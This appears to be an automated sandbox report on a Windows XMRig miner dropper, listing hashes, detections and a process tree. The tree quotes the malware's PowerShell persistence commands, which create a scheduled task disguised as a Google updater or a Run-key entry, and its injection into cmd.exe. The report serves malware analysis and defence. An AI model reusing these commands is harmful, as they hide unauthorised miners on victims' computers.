Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
27-09-2022 05:48
Static task
static1
Behavioral task
behavioral1
Sample
f6fd2a4333007f65beef7609077ec14d.exe
Resource
win7-20220901-en
General
-
Target
f6fd2a4333007f65beef7609077ec14d.exe
-
Size
2.2MB
-
MD5
f6fd2a4333007f65beef7609077ec14d
-
SHA1
3740133e77fae5ee1c0ed1cb0493af5557e3562a
-
SHA256
b2c7dfbe576c1962cd647917207e957d17dbe367c36dde071054f12beac68499
-
SHA512
43c8b557b1bbfb353d4fe37d09c4dd94c7aaab9d9a6fda421144e40e81e2732df7dbd9faa67ca0e1779e787a8771fbcd9496dee2ae03530462910d1393e513d7
-
SSDEEP
49152:C30HPteDTvEXI2s+HNZlZT+DM+dRQYpeV+wj:CgPteDTsIInZWM+bpeV+
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4672-151-0x00007FF63B180000-0x00007FF63B974000-memory.dmp xmrig behavioral2/memory/4672-152-0x00007FF63B180000-0x00007FF63B974000-memory.dmp xmrig -
Blocklisted process makes network request 17 IoCs
Processes:
cmd.exeflow pid process 24 4672 cmd.exe 25 4672 cmd.exe 29 4672 cmd.exe 37 4672 cmd.exe 38 4672 cmd.exe 41 4672 cmd.exe 43 4672 cmd.exe 44 4672 cmd.exe 45 4672 cmd.exe 46 4672 cmd.exe 47 4672 cmd.exe 48 4672 cmd.exe 49 4672 cmd.exe 50 4672 cmd.exe 51 4672 cmd.exe 52 4672 cmd.exe 53 4672 cmd.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 4112 updater.exe -
Processes:
resource yara_rule behavioral2/memory/4672-151-0x00007FF63B180000-0x00007FF63B974000-memory.dmp upx behavioral2/memory/4672-152-0x00007FF63B180000-0x00007FF63B974000-memory.dmp upx -
Suspicious use of SetThreadContext 1 IoCs
Processes:
updater.exedescription pid process target process PID 4112 set thread context of 4672 4112 updater.exe cmd.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 4360 powershell.exe 4360 powershell.exe 224 powershell.exe 224 powershell.exe 1360 powershell.exe 1360 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4360 powershell.exe Token: SeIncreaseQuotaPrivilege 4360 powershell.exe Token: SeSecurityPrivilege 4360 powershell.exe Token: SeTakeOwnershipPrivilege 4360 powershell.exe Token: SeLoadDriverPrivilege 4360 powershell.exe Token: SeSystemProfilePrivilege 4360 powershell.exe Token: SeSystemtimePrivilege 4360 powershell.exe Token: SeProfSingleProcessPrivilege 4360 powershell.exe Token: SeIncBasePriorityPrivilege 4360 powershell.exe Token: SeCreatePagefilePrivilege 4360 powershell.exe Token: SeBackupPrivilege 4360 powershell.exe Token: SeRestorePrivilege 4360 powershell.exe Token: SeShutdownPrivilege 4360 powershell.exe Token: SeDebugPrivilege 4360 powershell.exe Token: SeSystemEnvironmentPrivilege 4360 powershell.exe Token: SeRemoteShutdownPrivilege 4360 powershell.exe Token: SeUndockPrivilege 4360 powershell.exe Token: SeManageVolumePrivilege 4360 powershell.exe Token: 33 4360 powershell.exe Token: 34 4360 powershell.exe Token: 35 4360 powershell.exe Token: 36 4360 powershell.exe Token: SeIncreaseQuotaPrivilege 4360 powershell.exe Token: SeSecurityPrivilege 4360 powershell.exe Token: SeTakeOwnershipPrivilege 4360 powershell.exe Token: SeLoadDriverPrivilege 4360 powershell.exe Token: SeSystemProfilePrivilege 4360 powershell.exe Token: SeSystemtimePrivilege 4360 powershell.exe Token: SeProfSingleProcessPrivilege 4360 powershell.exe Token: SeIncBasePriorityPrivilege 4360 powershell.exe Token: SeCreatePagefilePrivilege 4360 powershell.exe Token: SeBackupPrivilege 4360 powershell.exe Token: SeRestorePrivilege 4360 powershell.exe Token: SeShutdownPrivilege 4360 powershell.exe Token: SeDebugPrivilege 4360 powershell.exe Token: SeSystemEnvironmentPrivilege 4360 powershell.exe Token: SeRemoteShutdownPrivilege 4360 powershell.exe Token: SeUndockPrivilege 4360 powershell.exe Token: SeManageVolumePrivilege 4360 powershell.exe Token: 33 4360 powershell.exe Token: 34 4360 powershell.exe Token: 35 4360 powershell.exe Token: 36 4360 powershell.exe Token: SeIncreaseQuotaPrivilege 4360 powershell.exe Token: SeSecurityPrivilege 4360 powershell.exe Token: SeTakeOwnershipPrivilege 4360 powershell.exe Token: SeLoadDriverPrivilege 4360 powershell.exe Token: SeSystemProfilePrivilege 4360 powershell.exe Token: SeSystemtimePrivilege 4360 powershell.exe Token: SeProfSingleProcessPrivilege 4360 powershell.exe Token: SeIncBasePriorityPrivilege 4360 powershell.exe Token: SeCreatePagefilePrivilege 4360 powershell.exe Token: SeBackupPrivilege 4360 powershell.exe Token: SeRestorePrivilege 4360 powershell.exe Token: SeShutdownPrivilege 4360 powershell.exe Token: SeDebugPrivilege 4360 powershell.exe Token: SeSystemEnvironmentPrivilege 4360 powershell.exe Token: SeRemoteShutdownPrivilege 4360 powershell.exe Token: SeUndockPrivilege 4360 powershell.exe Token: SeManageVolumePrivilege 4360 powershell.exe Token: 33 4360 powershell.exe Token: 34 4360 powershell.exe Token: 35 4360 powershell.exe Token: 36 4360 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
cmd.exepid process 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
cmd.exepid process 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe 4672 cmd.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
f6fd2a4333007f65beef7609077ec14d.exepowershell.exeupdater.execmd.exedescription pid process target process PID 3544 wrote to memory of 4360 3544 f6fd2a4333007f65beef7609077ec14d.exe powershell.exe PID 3544 wrote to memory of 4360 3544 f6fd2a4333007f65beef7609077ec14d.exe powershell.exe PID 3544 wrote to memory of 224 3544 f6fd2a4333007f65beef7609077ec14d.exe powershell.exe PID 3544 wrote to memory of 224 3544 f6fd2a4333007f65beef7609077ec14d.exe powershell.exe PID 224 wrote to memory of 3800 224 powershell.exe schtasks.exe PID 224 wrote to memory of 3800 224 powershell.exe schtasks.exe PID 4112 wrote to memory of 1360 4112 updater.exe powershell.exe PID 4112 wrote to memory of 1360 4112 updater.exe powershell.exe PID 4112 wrote to memory of 664 4112 updater.exe cmd.exe PID 4112 wrote to memory of 664 4112 updater.exe cmd.exe PID 664 wrote to memory of 2992 664 cmd.exe WMIC.exe PID 664 wrote to memory of 2992 664 cmd.exe WMIC.exe PID 4112 wrote to memory of 4672 4112 updater.exe cmd.exe PID 4112 wrote to memory of 4672 4112 updater.exe cmd.exe PID 4112 wrote to memory of 4672 4112 updater.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f6fd2a4333007f65beef7609077ec14d.exe"C:\Users\Admin\AppData\Local\Temp\f6fd2a4333007f65beef7609077ec14d.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#oqazi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵
-
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeC:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe mrcpapowlrrgcvjb 6E3sjfZq2rJQaxvLPmXgsEqPiBiBLmVqlQRiqAROwnq+r3PgsvOI5CPEjWBkfjMBWeIX+GdZdCENkRpNNWWuUuiiT0nhr8xABS5D2B/qge2fBy16M7G/el0gdMCErX4jNqcnUz2ARFIRcMCpcOiMWItfgkpYfgbwioV0ioLoGuNMU42qRMuIsqjDs2FXseGAy1L1fh1Re+jaH/pdMkIbkcsE1vSzYIpH8WyjqEMFAlci5CLdLe97i0VD0mpaS+Gd+daXi5rj++LAHgkUTDqtbVL59AFDJZ9WYwE1hVlCLXncC2+//LOROJeHXBaIJ7E+zEF1XB8rOli3v9a2WUYdKol3fQS1Z2oPF18nYGSur3scnVljXe+vL6dRgItNbPO72⤵
- Blocklisted process makes network request
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD500e7da020005370a518c26d5deb40691
SHA1389b34fdb01997f1de74a5a2be0ff656280c0432
SHA256a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe
SHA5129a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD538a3e6d454e2b12d2d5ffb64b99ea6aa
SHA1c538daed6a6e064ea7c0262c20131494194371f9
SHA256f412e4f4238fb2df1cf0dfa74ccb339f368f1d6dbea719ca1ec325a22a4f954a
SHA5120e849a81beaeed7cfee9c10e59bfdebfb4f0c9a68ec54f3db82077332ad53fb8a65753d05c1611ee38c34db938697b8c15cd2188b88a7045c8f868d383c02199
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5a5c074e56305e761d7cbc42993300e1c
SHA139b2e23ba5c56b4f332b3607df056d8df23555bf
SHA256e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953
SHA512c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8
-
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeFilesize
2.2MB
MD5d081ded7aeebd495ea24b5531168f315
SHA121db4bae653ece87474e7121a8b60d9fd08208c9
SHA2566e077c8a35fb28692230158cb9d80104cad9be31c06d64eb091c4cab81669d6a
SHA51245dd10bcf9bcd298060ddd6a9e8afc4a938d490db632d9b1ff2c1826975be35009b87d2d7b9a4e2869882aa41dafeb6aba23d8fd4c9d11996b5ffbc8a095c8a0
-
C:\Users\Admin\AppData\Roaming\Google\Libs\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
memory/224-136-0x0000000000000000-mapping.dmp
-
memory/224-141-0x00007FFDF4230000-0x00007FFDF4CF1000-memory.dmpFilesize
10.8MB
-
memory/664-146-0x0000000000000000-mapping.dmp
-
memory/1360-142-0x0000000000000000-mapping.dmp
-
memory/1360-144-0x00007FFDF4180000-0x00007FFDF4C41000-memory.dmpFilesize
10.8MB
-
memory/1360-145-0x00007FFDF4180000-0x00007FFDF4C41000-memory.dmpFilesize
10.8MB
-
memory/2992-147-0x0000000000000000-mapping.dmp
-
memory/3800-139-0x0000000000000000-mapping.dmp
-
memory/4360-132-0x0000000000000000-mapping.dmp
-
memory/4360-135-0x00007FFDF4230000-0x00007FFDF4CF1000-memory.dmpFilesize
10.8MB
-
memory/4360-134-0x00007FFDF4230000-0x00007FFDF4CF1000-memory.dmpFilesize
10.8MB
-
memory/4360-133-0x0000022A99D30000-0x0000022A99D52000-memory.dmpFilesize
136KB
-
memory/4672-149-0x00007FF63B9725D0-mapping.dmp
-
memory/4672-150-0x000002776AE20000-0x000002776AE40000-memory.dmpFilesize
128KB
-
memory/4672-151-0x00007FF63B180000-0x00007FF63B974000-memory.dmpFilesize
8.0MB
-
memory/4672-152-0x00007FF63B180000-0x00007FF63B974000-memory.dmpFilesize
8.0MB